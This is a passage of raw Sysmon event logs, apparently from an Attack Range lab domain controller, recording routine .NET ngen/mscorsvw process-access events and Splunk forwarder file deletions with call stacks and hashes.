14:57:52.670{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-830D-00000000BB01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.670{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-830D-00000000BB01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.654{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\tokens.dat.bakMD5=18634F63E309417B425611F086665A8A,SHA256=FAF0145B32DEDA318681A293CC402859AD320E7771752590253AF48C2F0459BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.639{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-820D-00000000BB01}6844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.623{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-820D-00000000BB01}6844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.623{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-820D-00000000BB01}6844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.467{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-810D-00000000BB01}3192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.451{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-810D-00000000BB01}3192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.451{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-810D-00000000BB01}3192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.451{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3AA55FB60A719F942BC1C0EED7D7C6D,SHA256=810A32D6C24F39D280923C4B86D0ED3EA10229BA66D066FE3F083947DF81CBF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.451{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=548270C59EA95F0EA401871CFD9F500B,SHA256=6233D88B78583E3553CBB337886B5FE73B1880B93B24D8FA2648C23124DDFE8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.404{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-800D-00000000BB01}2600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.389{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-800D-00000000BB01}2600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.389{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-800D-00000000BB01}2600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.264{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-7F0D-00000000BB01}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.248{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-7F0D-00000000BB01}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.248{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-7F0D-00000000BB01}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.155{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-7E0D-00000000BB01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.139{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-7E0D-00000000BB01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.139{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-7E0D-00000000BB01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.076{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-7D0D-00000000BB01}6524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.061{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-7D0D-00000000BB01}6524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.061{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-7D0D-00000000BB01}6524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.014{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-7C0D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.998{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-7C0D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 